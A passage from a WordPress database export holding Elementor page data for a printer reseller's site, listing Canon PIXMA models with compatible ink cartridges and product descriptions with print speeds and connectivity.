Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Red)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Yellow)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b7fc065\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"387b65d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA PRO-10<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-72 (Chroma Optimizer)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Matte Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Photo Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Red)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA PRO-100<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-42 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Light Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TR8570<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS207<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS307<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS5070<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-771 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-770 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-770XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS5170<\\/p><\\/td><td width=\\\"208\\\"><p>CL-741 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-741XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740\\/CL-741 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"736141f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9e8521a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS8270<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS9170<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS9570<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(6946,3305,'_elementor_version','2.5.14'),(6949,3306,'_wp_page_template','template-fullwidth.php'),(6950,3306,'_elementor_edit_mode','builder'),(6951,3306,'_elementor_template_type','post'),(6952,3306,'_elementor_data','[{\"id\":\"9ac79cf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"2a109eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d59285\",\"elType\":\"widget\",\"settings\":{\"title\":\"Injet Printers :-\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca9ead8\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"9a9d292\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"align\":\"center\"},\"elements\":[{\"id\":\"6ad8678\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA E560 \\/ E560R\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70128a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png\",\"id\":2345}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"509ac9b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Advanced Wireless All-In-One with Auto Duplex\\u00a0Printing for Low-Cost Printing<\\/p><p>The Ink Efficient E560 \\/ E560R is designed to give you an affordable wireless printing experience at low running cost of up to 800 pages.<\\/p><p>Available in Black and Red.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO Standard print speed (A4): up to 9.9ipm black \\/ 5.7ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi<\\/p><p>Recommended print volume: 80 - 400 pages<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1ba38c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9b84d1c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"25\",\"bottom\":\"25\",\"left\":\"25\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"19ec1cd\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"d3a1ece\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA E4270\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"47167d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png\",\"id\":2346}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"c56690e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Compact Wireless All-In-One with Fax and automatic 2-sided printing for Low-Cost Printing<\\/p><p>This compact Office All-In-One features a 20-sheet Auto Document Feeder for productivity and delivers up to 400 pages yield with high-capacity ink cartridges.<\\/p><p>Print, Scan, Copy, Fax<\\/p><p>ISO standard print speed (A4): 8.8ipm black \\/ 4.4ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Wireless Direct<\\/p><p>Recommended print volume: 50 - 200 pages<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"189f9a2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"df0825f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"11\\\" ]<\\/span><\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"17\",\"bottom\":\"17\",\"left\":\"17\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"692b43d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a99e262\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA TS9570\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6a04479\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png\",\"id\":2347}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6ab42ff\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>A3 Wireless Photo Printer with Large 4.3\\u201d Touch-Screen and Auto Document Feeder<\\/p><p>This A3 wireless compact Photo All-In-One printer combines amazing compactness and a wide range of printing options for the complete home and small office printing experience.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO standard print speed (A4): up to 15.0ipm black \\/ 10.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, wired LAN, memory card slot, wireless\\/wired LAN PictBridge, Mopria, AirPrint, BLE, Wireless Direct<\\/p><p>Recommended print volume: 80 - 300 pages<\\/p><center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"657c5e2\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"1c9048c\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA TS8270\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e5da999\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png\",\"id\":2348}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8c06b04\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wireless Photo All-In-One with Large 4.3\\u201d Touch-Screen and Auto Duplex Printing<\\/p><p>This advanced wireless Photo All-In-One is beautifully designed with a wide range of printing options for the complete home printing experience.<\\/p><p>Available in Black, Red and White.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO standard print speed (A4): up to 15.0ipm black \\/ 10.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, memory card slot, wireless Pictbridge, Mopria, AirPrint, BLE, Wireless Direct<\\/p><p>Recommended print volume: 30 - 100 pages<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"89b9be8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center><\\/center><center><\\/center><center><\\/center><center><\\/center><center><\\/center><center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"11\",\"right\":\"11\",\"bottom\":\"11\",\"left\":\"11\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e19c5ed\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"48b8328\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"619d0d9\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G2010\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b641ed3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png\",\"id\":2349}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"cb6e9e3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print, Scan &amp; Copy<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p><center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ef95652\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"72caeea\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G4010\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1a96790\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/095399e7118a4e898b6df8c1808358de_g4010_03.png\",\"id\":2351}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"bc59f5a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost.<\\/p><p>Print, Scan, Copy and Fax<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Access Point Mode<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p><center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"49effc0\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"79b85a4\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G1010\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4266d0e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png\",\"id\":2352}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"79cfa28\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank Printer for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm (mono) \\/ 5.0ipm (colour)<\\/p><p>Photo Speed (4 x 6\\\"): 60sec. (borderless)<\\/p><center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"35746a1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"9b7f21a\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G3010\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b8c2962\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/abbc0420f899426c86b9f547f8e0476d_g3010_01.png\",\"id\":2721}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"ca1fadd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank Wireless All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print, Scan &amp; Copy<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, Access Point Mode<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p><center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1ffb94f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"84b94b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"130ead1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Laser Printers :-\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"219f45c\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"39c2015\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ece285e\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS LBP113w\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1273d18\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png\",\"id\":2724}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6b60692\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><h4 class=\\\"sub-title\\\">Compact with wireless connectivity<\\/h4><\\/div><p>Simple to operate and compact in size, the ideal choice for your printing needs.<\\/p><ul class=\\\"list-normal\\\"><li>Print<\\/li><li>Print Speed (A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>First Print Out Time (A4): Approx. 6.5 sec<\\/li><li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li><li>Mobile Connectivity.<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" 